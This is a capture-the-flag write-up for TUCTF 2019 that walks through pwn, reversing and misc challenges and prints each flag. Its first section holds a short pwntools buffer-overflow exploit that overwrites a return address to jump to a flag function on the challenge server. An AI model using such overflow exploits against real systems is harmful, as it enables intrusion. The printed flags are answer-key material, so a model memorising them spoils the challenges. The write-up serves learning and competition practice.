TUCTF 2019 | 0c34n

Introduction

Should really be studying for upcoming test.

Pwn

The First

Running info functions in gdb, we see that there is a printFlag function. Just overflow the buffer and jump to the function to get the flag. Exploit script is as follows,

from pwn import *

payload = 'A'*24+'\xf6\x91\x04\x08'

r = remote('chal.tuctf.com', 30508)

r.recvuntil('>')
r.send(payload)
r.interactive()

Reversing

Faker

Decompiled in ghidra and rewrote in python. Notice the parameters printFlag is called with. Used that to get the flag.

param1 = "\\PJ\\fC|)L0LTw@Yt@;Twmq0Lw|qw@w2$a@0;w|)@awmLL|Tw|)LwZL2lhhL0k"
flag=''
for i in range(len(param1)):
	flag+=chr(((((ord(param1[i])^0xf)-0x1d)*8)%0x5f)+0x20)

print flag

Flag: TUCTF{7h3r35_4lw4y5_m0r3_70_4_b1n4ry_7h4n_m3375_7h3_d3bu663r}

Object

Decompile in ghidra and reconstructed the program in python.

password=[0xfd, 0xff, 0xd3, 0xfd, 0xd9, 0xa3, 0x93, 0x35, 0x89, 0x39, 0xb1, 0x3d, 0x3b, 0xbf, 0x8d, 0x3d, 0x3b, 0x37, 0x35, 0x89, 0x3f, 0xeb, 0x35, 0x89, 0xeb, 0x91, 0xb1, 0x33, 0x3d, 0x83, 0x37, 0x89, 0x39, 0xeb, 0x3b, 0x85, 0x37, 0x3f, 0xeb, 0x99, 0x8d, 0x3d, 0x39, 0xaf, 0x00]
flag=''
for i in range(len(password)):
	c = password[i]
	flag+= chr(((c^255)^0xaa)>>1)
print flag

Flag: TUCTF{c0n6r47ul4710n5_0n_br34k1n6_7h15_fl46}

Misc

Onions

We are given an image. Naturally, the first thing I did was inspect the image exif for anything that stands out. But there’s nothing special to be seen there. Tried running foremost on the file to extract hidden files, no result either. Running binwalk we get,

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             JPEG image data, JFIF standard 1.01
275566        0x4346E         7-zip archive data, version 0.4

Since foremost couldn’t extract the file, maybe binwalk -e can. No result…

In that case, lets just straight up unzip the image with 7z e shrek.jpg. That surprisingly worked… Now we just continue unzipping the archives that pop out until we get the flag.

Flag: TUCTF{F1L3S4R3L1K30N10NSTH3YH4V3L4Y3RS}

Super Secret

We are given an ODT file. When trying to open it, LibreOffice asks us if we want to enable macros. Hmm.. maybe there’s something there. To further inspect the file, we unzip it and we see a suspicious file flag.xml, and in it lies our flag.

Flag: TUCTF{ST0P_TRUST1NG_M4CR0S_FR0M_4N_UNKN0WN_S0URC3}